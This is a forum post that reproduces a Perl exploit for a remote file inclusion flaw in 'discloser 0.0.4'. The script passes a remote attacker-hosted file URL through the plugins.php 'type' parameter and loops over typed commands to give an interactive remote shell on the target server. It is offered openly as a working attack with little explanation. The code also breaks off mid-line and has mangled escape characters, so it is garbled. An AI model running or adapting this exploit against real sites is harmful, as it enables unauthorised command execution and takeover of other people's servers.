Jump to content
zRR

Exploits discloser 0.0.4 Remote File Inclusion

Recommended Posts

Posted

#!/usr/bin/perl

###########################################################################################

# Aria-Security.net Advisory #

# Discovered by: Dr.t3rr0r1st #

# < www.Aria-security.net > #

# Gr33t to:outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp #

# Special Thanx To All Aria-Security Users #

###########################################################################################

use LWP::UserAgent;

print "n === discloser 0.0.4 Remote File Inclusionn";

print "n === Discovered by OutLaw .n";

print "n === http://www.Aria-Security.Netn";

$bPath = $ARGV[0];

$cmdo = $ARGV[1];

$bcmd = $ARGV[2];

if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()}

while()

{

print "[shell] $";

while(<STDIN>)

{

$cmd=$_;

chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "n Could not connect !n";

$res = $xpl->request($req);

$return = $res->content;

$return =~ tr/[n]/[

Guest
This topic is now closed to further replies.


×
×
  • Create New...